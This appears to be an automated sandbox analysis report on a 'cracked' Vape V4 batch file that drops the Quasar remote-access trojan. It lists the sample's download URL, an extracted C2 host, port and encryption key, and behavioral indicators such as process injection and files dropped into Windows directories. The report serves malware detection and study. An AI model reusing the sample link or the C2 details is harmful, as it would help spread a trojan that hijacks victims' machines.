Resubmissions
Analysis
-
max time kernel
40s -
max time network
41s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
03-06-2024 18:33
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat
Resource
win10v2004-20240426-en
General
-
Target
https://raw.githubusercontent.com/insomniastealer/vapev4-crack/main/VapeV4-cracked.bat
Malware Config
Extracted
quasar
1.0.0.0
v15.6.7 | GotTermed
elated-grass-07331.pktriot.net:22233
3c4f9f0f-6b9b-4427-95ce-8191fe249b5a
-
encryption_key
2625A64B59BF89EF5DAC76FF4DD28779A4574274
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
-
startup_key
$sxr-seroxen
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3416-205-0x000001B19BAC0000-0x000001B19C280000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
VapeV4-cracked.bat.exe$sxr-powershell.exedescription pid process target process PID 1204 created 612 1204 VapeV4-cracked.bat.exe winlogon.exe PID 3416 created 612 3416 $sxr-powershell.exe winlogon.exe PID 3416 created 612 3416 $sxr-powershell.exe winlogon.exe -
Executes dropped EXE 3 IoCs
Processes:
VapeV4-cracked.bat.exe$sxr-powershell.exe$sxr-powershell.exepid process 1204 VapeV4-cracked.bat.exe 3416 $sxr-powershell.exe 660 $sxr-powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 11 IoCs
Processes:
svchost.exeVapeV4-cracked.bat.exe$sxr-powershell.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\System32\vcruntime140_1d.dll VapeV4-cracked.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll VapeV4-cracked.bat.exe File opened for modification C:\Windows\System32\vcruntime140d.dll VapeV4-cracked.bat.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll $sxr-powershell.exe File opened for modification C:\Windows\System32\vcruntime140d.dll $sxr-powershell.exe File created C:\Windows\System32\ucrtbased.dll VapeV4-cracked.bat.exe File created C:\Windows\System32\vcruntime140d.dll VapeV4-cracked.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll VapeV4-cracked.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll $sxr-powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
VapeV4-cracked.bat.exe$sxr-powershell.exedescription pid process target process PID 1204 set thread context of 3792 1204 VapeV4-cracked.bat.exe dllhost.exe PID 3416 set thread context of 1300 3416 $sxr-powershell.exe dllhost.exe PID 3416 set thread context of 632 3416 $sxr-powershell.exe dllhost.exe -
Drops file in Windows directory 8 IoCs
Processes:
cmd.exeVapeV4-cracked.bat.exedescription ioc process File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File created C:\Windows\$sxr-powershell.exe VapeV4-cracked.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe VapeV4-cracked.bat.exe File created C:\Windows\$sxr-mshta.exe VapeV4-cracked.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe VapeV4-cracked.bat.exe File created C:\Windows\$sxr-cmd.exe VapeV4-cracked.bat.exe File opened for modification C:\Windows\$sxr-cmd.exe VapeV4-cracked.bat.exe File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 56 IoCs
Processes:
msedge.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe1100000096c7af35d697da0165473838d697da0129c8fb38d697da0114000000 msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell msedge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 msedge.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" msedge.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exemsedge.exeVapeV4-cracked.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exedllhost.exepid process 1020 msedge.exe 1020 msedge.exe 2308 msedge.exe 2308 msedge.exe 2600 msedge.exe 2600 msedge.exe 1204 VapeV4-cracked.bat.exe 1204 VapeV4-cracked.bat.exe 1204 VapeV4-cracked.bat.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 3792 dllhost.exe 1204 VapeV4-cracked.bat.exe 1204 VapeV4-cracked.bat.exe 3416 $sxr-powershell.exe 3416 $sxr-powershell.exe 3416 $sxr-powershell.exe 3416 $sxr-powershell.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 3416 $sxr-powershell.exe 3416 $sxr-powershell.exe 660 $sxr-powershell.exe 660 $sxr-powershell.exe 3416 $sxr-powershell.exe 632 dllhost.exe 632 dllhost.exe 660 $sxr-powershell.exe 660 $sxr-powershell.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe 632 dllhost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
Processes:
msedge.exepid process 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
VapeV4-cracked.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exedllhost.exedescription pid process Token: SeDebugPrivilege 1204 VapeV4-cracked.bat.exe Token: SeDebugPrivilege 1204 VapeV4-cracked.bat.exe Token: SeDebugPrivilege 3792 dllhost.exe Token: SeDebugPrivilege 3416 $sxr-powershell.exe Token: SeDebugPrivilege 3416 $sxr-powershell.exe Token: SeDebugPrivilege 1300 dllhost.exe Token: SeDebugPrivilege 660 $sxr-powershell.exe Token: SeDebugPrivilege 3416 $sxr-powershell.exe Token: SeDebugPrivilege 632 dllhost.exe -
Suspicious use of FindShellTrayWindow 31 IoCs
Processes:
msedge.exepid process 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe 2308 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
msedge.exe$sxr-powershell.exepid process 2600 msedge.exe 3416 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 2308 wrote to memory of 2656 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 2656 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 3936 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 1020 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 1020 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe PID 2308 wrote to memory of 4564 2308 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7d0dcb43-b0b1-449d-b3ca-1afdfc87b349}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1531fde5-f422-4287-9f31-d96ec09f8af0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3d6a3d88-7e64-426d-b795-456c1f759727}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
